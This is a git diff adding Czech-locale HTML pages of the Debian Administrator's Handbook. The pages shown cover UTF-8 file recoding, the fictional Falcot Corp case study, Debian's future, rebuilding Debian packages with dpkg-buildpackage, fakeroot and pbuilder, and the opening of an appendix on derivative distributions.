+				For the file content, conversion procedures are more complex due to the vast variety of existing file formats. Some file formats include encoding information that facilitates the tasks of the software used to treat them; it is sufficient, then, to open these files and re-save them specifying UTF-8 encoding. In other cases, you have to specify the original encoding (ISO-8859-1 or “Western”, or ISO-8859-15 or “Western (Euro)”, according to the formulations) when opening the file.
+			</div><div
+              class="para">
+				For simple text files, you can use <code
+                class="command">recode</code> (in the package of the same name) which allows automatic recoding. This tool has numerous options so you can play with its behavior. We recommend you consult the documentation, the <span
+                class="citerefentry"><span
+                  class="refentrytitle">recode</span>(1)</span> man page, or the <span
+                class="citerefentry"><span
+                  class="refentrytitle">recode</span></span> info page (more complete).
+			</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.common-procedures.html"><strong>Předcházející</strong>7.2. Common Procedures</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.network-config.html"><strong>Další</strong>8.2. Configuring the Network</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/case-study.html b/tmp/cs-CZ/html/case-study.html
new file mode 100644
index 000000000..86811f8a4
--- /dev/null
+++ b/tmp/cs-CZ/html/case-study.html
@@ -0,0 +1,140 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Kapitola 2. Presenting the Case Study</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Falcot Corp, SMB, Strong Growth, Master Plan, Migration, Cost Reduction" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.release-lifecycle.html"
+        title="1.6. Lifecycle of a Release" /><link
+        rel="next"
+        href="sect.master-plan.html"
+        title="2.2. Master Plan" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/case-study.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.release-lifecycle.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.master-plan.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="chapter"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="case-study"></a>Kapitola 2. Presenting the Case Study</h1></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="section"><a
+                  href="case-study.html#sect.fast-growing-it-needs">2.1. Fast Growing IT Needs</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.master-plan.html">2.2. Master Plan</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.why-gnu-linux.html">2.3. Why a GNU/Linux Distribution?</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.why-debian.html">2.4. Why the Debian Distribution?</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.why-debian.html#id-1.5.8.5">2.4.1. Commercial and Community Driven Distributions</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.why-debian-stable.html">2.5. Why Debian Stretch?</a></span></dt></dl></div><div
+          class="highlights"><div
+            class="para">
+		In the context of this book, you are the system administrator of a growing small business. The time has come for you to redefine the information systems master plan for the coming year in collaboration with your directors. You choose to progressively migrate to Debian, both for practical and economical reasons. Let's see in more detail what's in store for you…
+	</div></div><div
+          class="para">
+		We have envisioned this case study to approach all modern information system services currently used in a medium sized company. After reading this book, you will have all of the elements necessary to install Debian on your servers and fly on your own wings. You will also learn how to efficiently find information in the event of difficulties.
+	</div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.fast-growing-it-needs"></a>2.1. Fast Growing IT Needs</h2></div></div></div><div
+            class="para">
+			Falcot Corp is a manufacturer of high quality audio equipment. The company is growing strongly, and has two facilities, one in Saint-Étienne, and another in Montpellier. The former has around 150 employees; it hosts a factory for the manufacturing of speakers, a design lab, and all administrative office. The Montpellier site is smaller, with only about 50 workers, and produces amplifiers.
+		</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NOTE</em></span> Fictional company created for case study</strong></p></div></div></div><div
+              class="para">
+			The Falcot Corp company used as an example here is completely fictional. Any resemblance to an existing company is purely coincidental. Likewise, some example data throughout this book may be fictional.
+		</div></div><div
+            class="para">
+			The information system has had difficulty keeping up with the company's growth, so they are now determined to completely redefine it to meet various goals established by management:
+		</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+					modern, easily scalable infrastructure;
+				</div></li><li
+                class="listitem"><div
+                  class="para">
+					reducing cost of software licenses thanks to use of Open Source software;
+				</div></li><li
+                class="listitem"><div
+                  class="para">
+					installation of an e-commerce website, possibly B2B (business to business, i.e. linking of information systems between different companies, such as a supplier and its clients);
+				</div></li><li
+                class="listitem"><div
+                  class="para">
+					significant improvement in security to better protect trade secrets related to new products.
+				</div></li></ul></div><div
+            class="para">
+			The entire information system will be overhauled with these goals in mind.
+		</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.release-lifecycle.html"><strong>Předcházející</strong>1.6. Lifecycle of a Release</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.master-plan.html"><strong>Další</strong>2.2. Master Plan</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/conclusion.html b/tmp/cs-CZ/html/conclusion.html
new file mode 100644
index 000000000..1a01ce750
--- /dev/null
+++ b/tmp/cs-CZ/html/conclusion.html
@@ -0,0 +1,116 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Kapitola 16. Conclusion: Debian's Future</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Future, Improvements, Opinions" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.becoming-package-maintainer.html"
+        title="15.4. Becoming a Package Maintainer" /><link
+        rel="next"
+        href="sect.future-of-debian.html"
+        title="16.2. Debian's Future" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/conclusion.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.becoming-package-maintainer.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.future-of-debian.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="chapter"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="conclusion"></a>Kapitola 16. Conclusion: Debian's Future</h1></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="section"><a
+                  href="conclusion.html#sect.upcoming-developments">16.1. Upcoming Developments</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.future-of-debian.html">16.2. Debian's Future</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.future-of-this-book.html">16.3. Future of this Book</a></span></dt></dl></div><div
+          class="highlights"><div
+            class="para">
+		The story of Falcot Corp ends with this last chapter; but Debian lives on, and the future will certainly bring many interesting surprises.
+	</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.upcoming-developments"></a>16.1. Upcoming Developments</h2></div></div></div><div
+            class="para">
+			Weeks (or months) before a new version of Debian is released, the Release Manager picks the codename for the next version. Now that Debian version 8 is out, the developers are already busy working on the next version, codenamed <span
+              class="distribution distribution">Stretch</span>…
+		</div><div
+            class="para">
+			There is no official list of planned changes, and Debian never makes promises relating to technical goals of the coming versions. However, a few development trends can already be noted, and we can try some bets on what might happen (or not).
+		</div><div
+            class="para">
+			In order to improve security and trust, most if not all the packages will be made to build reproducibly; that is to say, it will be possible to rebuild byte-for-byte identical binary packages from the source packages, thus allowing everyone to verify that no tampering has happened during the builds.
+		</div><div
+            class="para">
+			In a related theme, a lot of effort will have gone into improving security by default, and mitigating both “traditional” attacks and the new threats implied by mass surveillance.
+		</div><div
+            class="para">
+			Of course, all the main software suites will have had a major release. The latest version of the various desktops will bring better usability and new features. Wayland, the new display server that is being developed to replace X11 with a more modern alternative, will be available (although maybe not default) for at least some desktop environments.
+		</div><div
+            class="para">
+			A new feature of the archive maintenance software, “bikesheds”, will allow developers to host special-purpose package repositories in addition to the main repositories; this will allow for personal package repositories, repositories for software not ready to go into the main archive, repositories for software that has only a very small audience, temporary repositories for testing new ideas, and so on.
+		</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.becoming-package-maintainer.html"><strong>Předcházející</strong>15.4. Becoming a Package Maintainer</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.future-of-debian.html"><strong>Další</strong>16.2. Debian's Future</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/debian-packaging.html b/tmp/cs-CZ/html/debian-packaging.html
new file mode 100644
index 000000000..4e3ca7757
--- /dev/null
+++ b/tmp/cs-CZ/html/debian-packaging.html
@@ -0,0 +1,299 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Kapitola 15. Creating a Debian Package</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Backport, Rebuild, Source package, Archive, Meta-package, Debian Developer, Maintainer" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.dealing-with-compromised-machine.html"
+        title="14.7. Dealing with a Compromised Machine" /><link
+        rel="next"
+        href="sect.building-first-package.html"
+        title="15.2. Building your First Package" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/debian-packaging.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.dealing-with-compromised-machine.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.building-first-package.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="chapter"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="debian-packaging"></a>Kapitola 15. Creating a Debian Package</h1></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="section"><a
+                  href="debian-packaging.html#sect.rebuilding-package">15.1. Rebuilding a Package from its Sources</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="debian-packaging.html#id-1.18.4.3">15.1.1. Getting the Sources</a></span></dt><dt><span
+                    class="section"><a
+                      href="debian-packaging.html#id-1.18.4.4">15.1.2. Making Changes</a></span></dt><dt><span
+                    class="section"><a
+                      href="debian-packaging.html#id-1.18.4.5">15.1.3. Starting the Rebuild</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.building-first-package.html">15.2. Building your First Package</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.building-first-package.html#id-1.18.5.2">15.2.1. Meta-Packages or Fake Packages</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.building-first-package.html#id-1.18.5.3">15.2.2. Simple File Archive</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.setup-apt-package-repository.html">15.3. Creating a Package Repository for APT</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.becoming-package-maintainer.html">15.4. Becoming a Package Maintainer</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.becoming-package-maintainer.html#id-1.18.7.2">15.4.1. Learning to Make Packages</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.becoming-package-maintainer.html#id-1.18.7.3">15.4.2. Acceptance Process</a></span></dt></dl></dd></dl></div><div
+          class="highlights"><div
+            class="para">
+		It is quite common, for an administrator who has been handling Debian packages in a regular fashion, to eventually feel the need to create their own packages, or to modify an existing package. This chapter aims to answer the most common questions in this field, and provide the required elements to take advantage of the Debian infrastructure in the best way. With any luck, after trying your hand for local packages, you may even feel the need to go further than that and join the Debian project itself!
+	</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.rebuilding-package"></a>15.1. Rebuilding a Package from its Sources</h2></div></div></div><div
+            class="para">
+			Rebuilding a binary package is required under several sets of circumstances. In some cases, the administrator needs a software feature that requires the software to be compiled from sources, with a particular compilation option; in others, the software as packaged in the installed version of Debian is not recent enough. In the latter case, the administrator will usually build a more recent package taken from a newer version of Debian — such as <span
+              class="distribution distribution">Testing</span> or even <span
+              class="distribution distribution">Unstable</span> — so that this new package works in their <span
+              class="distribution distribution">Stable</span> distribution; this operation is called “backporting”. As usual, care should be taken, before undertaking such a task, to check whether it has been done already — a quick look on the Debian Package Tracker for that package will reveal that information. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://tracker.debian.org/">https://tracker.debian.org/</a></div> <a
+              id="id-1.18.4.2.5"
+              class="indexterm"></a>
+		</div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.18.4.3"></a>15.1.1. Getting the Sources</h3></div></div></div><div
+              class="para">
+				Rebuilding a Debian package starts with getting its source code. The easiest way is to use the <code
+                class="command">apt-get source <em
+                  class="replaceable">source-package-name</em></code> command. This command requires a <code
+                class="literal">deb-src</code> line in the <code
+                class="filename">/etc/apt/sources.list</code> file, and up-to-date index files (i.e. <code
+                class="command">apt-get update</code>). These conditions should already be met if you followed the instructions from the chapter dealing with APT configuration (see <a
+                class="xref"
+                href="apt.html#sect.apt-sources.list">6.1 – „Filling in the <code
+                  class="filename">sources.list</code> File“</a>). Note however, that you will be downloading the source packages from the Debian version mentioned in the <code
+                class="literal">deb-src</code> line. If you need another version, you may need to download it manually from a Debian mirror or from the web site. This involves fetching two or three files (with extensions <code
+                class="filename">*.dsc</code> — for <span
+                class="emphasis"><em>Debian Source Control</em></span> — <code
+                class="filename">*.tar.<em
+                  class="replaceable">comp</em></code>, and sometimes <code
+                class="filename">*.diff.gz</code> or <code
+                class="filename">*.debian.tar.<em
+                  class="replaceable">comp</em></code> — <em
+                class="replaceable">comp</em> taking one value among <code
+                class="literal">gz</code>, <code
+                class="literal">bz2</code> or <code
+                class="literal">xz</code> depending on the compression tool in use), then run the <code
+                class="command">dpkg-source -x <em
+                  class="replaceable">file.dsc</em></code> command. If the <code
+                class="filename">*.dsc</code> file is directly accessible at a given URL, there is an even simpler way to fetch it all, with the <code
+                class="command">dget <em
+                  class="replaceable">URL</em></code> command. This command (which can be found in the <span
+                class="pkg pkg">devscripts</span> package) fetches the <code
+                class="filename">*.dsc</code> file at the given address, then analyzes its contents, and automatically fetches the file or files referenced within. Once everything has been downloaded, it extracts the source package (unless the <code
+                class="literal">-d</code> or <code
+                class="literal">--download-only</code> option is used).
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.18.4.4"></a>15.1.2. Making Changes</h3></div></div></div><div
+              class="para">
+				The source of the package is now available in a directory named after the source package and its version (for instance, <span
+                class="emphasis"><em>samba-4.1.17+dfsg</em></span>); this is where we'll work on our local changes.
+			</div><div
+              class="para">
+				The first thing to do is to change the package version number, so that the rebuilt packages can be distinguished from the original packages provided by Debian. Assuming the current version is <code
+                class="literal">2:4.1.17+dfsg-2</code>, we can create version <code
+                class="literal">2:4.1.17+dfsg-2falcot1</code>, which clearly indicates the origin of the package. This makes the package version number higher than the one provided by Debian, so that the package will easily install as an update to the original package. Such a change is best effected with the <code
+                class="command">dch</code> command (<span
+                class="emphasis"><em>Debian CHangelog</em></span>) from the <span
+                class="pkg pkg">devscripts</span> package, with an command such as <code
+                class="command">dch --local falcot</code>. This invokes a text editor (<code
+                class="command">sensible-editor</code> — this should be your favorite editor if it is mentioned in the <code
+                class="varname">VISUAL</code> or <code
+                class="varname">EDITOR</code> environment variables, and the default editor otherwise) to allow documenting the differences brought by this rebuild. This editor shows us that <code
+                class="command">dch</code> really did change the <code
+                class="filename">debian/changelog</code> file.
+			</div><div
+              class="para">
+				When a change in build options is required, the changes need to be made in <code
+                class="filename">debian/rules</code>, which drives the steps in the package build process. In the simplest cases, the lines concerning the initial configuration (<code
+                class="literal">./configure …</code>) or the actual build (<code
+                class="literal">$(MAKE) …</code> or <code
+                class="literal">make …</code>) are easy to spot. If these commands are not explicitly called, they are probably a side effect of another explicit command, in which case please refer to their documentation to learn more about how to change the default behavior. With packages using <code
+                class="command">dh</code>, you might need to add an override for the <code
+                class="command">dh_auto_configure</code> or <code
+                class="command">dh_auto_build</code> commands (see their respective manual pages for explanations on how to achieve this).
+			</div><div
+              class="para">
+				Depending on the local changes to the packages, an update may also be required in the <code
+                class="filename">debian/control</code> file, which contains a description of the generated packages. In particular, this file contains <code
+                class="literal">Build-Depends</code> lines controlling the list of dependencies that must be fulfilled at package build time. These often refer to versions of packages contained in the distribution the source package comes from, but which may not be available in the distribution used for the rebuild. There is no automated way to determine if a dependency is real or only specified to guarantee that the build should only be attempted with the latest version of a library — this is the only available way to force an <span
+                class="emphasis"><em>autobuilder</em></span> to use a given package version during build, which is why Debian maintainers frequently use strictly versioned build-dependencies.
+			</div><div
+              class="para">
+				If you know for sure that these build-dependencies are too strict, you should feel free to relax them locally. Reading the files which document the standard way of building the software — these files are often called <code
+                class="filename">INSTALL</code> — will help you figure out the appropriate dependencies. Ideally, all dependencies should be satisfiable from the distribution used for the rebuild; if they are not, a recursive process starts, whereby the packages mentioned in the <code
+                class="literal">Build-Depends</code> field must be backported before the target package can be. Some packages may not need backporting, and can be installed as-is during the build process (a notable example is <span
+                class="pkg pkg">debhelper</span>). Note that the backporting process can quickly become complex if you are not careful. Therefore, backports should be kept to a strict minimum when possible.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>TIP</em></span> Installing <code
+                          class="literal">Build-Depends</code></strong></p></div></div></div><a
+                id="id-1.18.4.4.7.2"
+                class="indexterm"></a><div
+                class="para">
+				<code
+                  class="command">apt-get</code> allows installing all packages mentioned in the <code
+                  class="literal">Build-Depends</code> fields of a source package available in a distribution mentioned in a <code
+                  class="literal">deb-src</code> line of the <code
+                  class="filename">/etc/apt/sources.list</code> file. This is a simple matter of running the <code
+                  class="command">apt-get build-dep <em
+                    class="replaceable">source-package</em></code> command.
+			</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.18.4.5"></a>15.1.3. Starting the Rebuild</h3></div></div></div><div
+              class="para">
+				When all the needed changes have been applied to the sources, we can start generating the actual binary package (<code
+                class="filename">.deb</code> file). The whole process is managed by the <code
+                class="command">dpkg-buildpackage</code> command.
+			</div><div
+              class="example"><a
+                xmlns=""
+                id="id-1.18.4.5.3"></a><p
+                class="title"><strong>Příklad 15.1. Rebuilding a package</strong></p><div
+                class="example-contents"><pre
+                  class="screen"><code
+                    class="computeroutput">$ </code><strong
+                    class="userinput"><code>dpkg-buildpackage -us -uc
+</code></strong><code
+                    class="computeroutput">[...]
+</code></pre></div></div><div
+              class="sidebar"><a
+                xmlns=""
+                id="sidebar.fakeroot"></a><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>TOOL</em></span> <code
+                          class="command">fakeroot</code></strong></p></div></div></div><div
+                class="para">
+				In essence, the package creation process is a simple matter of gathering in an archive a set of existing (or built) files; most of the files will end up being owned by <span
+                  class="emphasis"><em>root</em></span> in the archive. However, building the whole package under this user would imply increased risks; fortunately, this can be avoided with the <code
+                  class="command">fakeroot</code> command. This tool can be used to run a program and give it the impression that it runs as <span
+                  class="emphasis"><em>root</em></span> and creates files with arbitrary ownership and permissions. When the program creates the archive that will become the Debian package, it is tricked into creating an archive containing files marked as belonging to arbitrary owners, including <span
+                  class="emphasis"><em>root</em></span>. This setup is so convenient that <code
+                  class="command">dpkg-buildpackage</code> uses <code
+                  class="command">fakeroot</code> by default when building packages.
+			</div><div
+                class="para">
+				Note that the program is only tricked into “believing” that it operates as a privileged account, and the process actually runs as the user running <code
+                  class="command">fakeroot <em
+                    class="replaceable">program</em></code> (and the files are actually created with that user's permissions). At no time does it actually get root privileges that it could abuse.
+			</div></div><div
+              class="para">
+				The previous command can fail if the <code
+                class="literal">Build-Depends</code> fields have not been updated, or if the related packages are not installed. In such a case, it is possible to overrule this check by passing the <code
+                class="literal">-d</code> option to <code
+                class="command">dpkg-buildpackage</code>. However, explicitly ignoring these dependencies runs the risk of the build process failing at a later stage. Worse, the package may seem to build correctly but fail to run properly: some programs automatically disable some of their features when a required library is not available at build time.
+			</div><div
+              class="para">
+				More often than not, Debian developers use a higher-level program such as <code
+                class="command">debuild</code>; this runs <code
+                class="command">dpkg-buildpackage</code> as usual, but it also adds an invocation of a program that runs many checks to validate the generated package against the Debian policy. This script also cleans up the environment so that local environment variables do not “pollute” the package build. The <code
+                class="command">debuild</code> command is one of the tools in the <span
+                class="emphasis"><em>devscripts</em></span> suite, which share some consistency and configuration to make the maintainers' task easier.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>QUICK LOOK</em></span> <code
+                          class="command">pbuilder</code></strong></p></div></div></div><a
+                id="id-1.18.4.5.7.2"
+                class="indexterm"></a><div
+                class="para">
+				The <code
+                  class="command">pbuilder</code> program (in the similarly named package) allows building a Debian package in a <span
+                  class="emphasis"><em>chrooted</em></span> environment. It first creates a temporary directory containing the minimal system required for building the package (including the packages mentioned in the <span
+                  class="emphasis"><em>Build-Depends</em></span> field). This directory is then used as the root directory (<code
+                  class="filename">/</code>), using the <code
+                  class="command">chroot</code> command, during the build process.
+			</div><div
+                class="para">
+				This tool allows the build process to happen in an environment that is not altered by users' manipulations. This also allows for quick detection of the missing build-dependencies (since the build will fail unless the appropriate dependencies are documented). Finally, it allows building a package for a Debian version that is not the one used by the system as a whole: the machine can be using <span
+                  class="distribution distribution">Stable</span> for its normal workload, and a <code
+                  class="command">pbuilder</code> running on the same machine can be using <span
+                  class="distribution distribution">Unstable</span> for package builds.
+			</div></div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.dealing-with-compromised-machine.html"><strong>Předcházející</strong>14.7. Dealing with a Compromised Machine</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.building-first-package.html"><strong>Další</strong>15.2. Building your First Package</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/derivative-distributions.html b/tmp/cs-CZ/html/derivative-distributions.html
new file mode 100644
index 000000000..8bbd257e5
--- /dev/null
+++ b/tmp/cs-CZ/html/derivative-distributions.html
@@ -0,0 +1,111 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Příloha A. Derivative Distributions</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Live CD, Specificities, Particular Choices" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.future-of-this-book.html"
+        title="16.3. Future of this Book" /><link
+        rel="next"
+        href="sect.ubuntu.html"
+        title="A.2. Ubuntu" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/derivative-distributions.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.future-of-this-book.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.ubuntu.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="appendix"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="derivative-distributions"></a>Příloha A. Derivative Distributions</h1></div></div></div><div
+          class="highlights"><div
+            class="para">
+		<a
+              id="id-1.20.3.1.1"
+              class="indexterm"></a> <a
+              id="id-1.20.3.1.2"
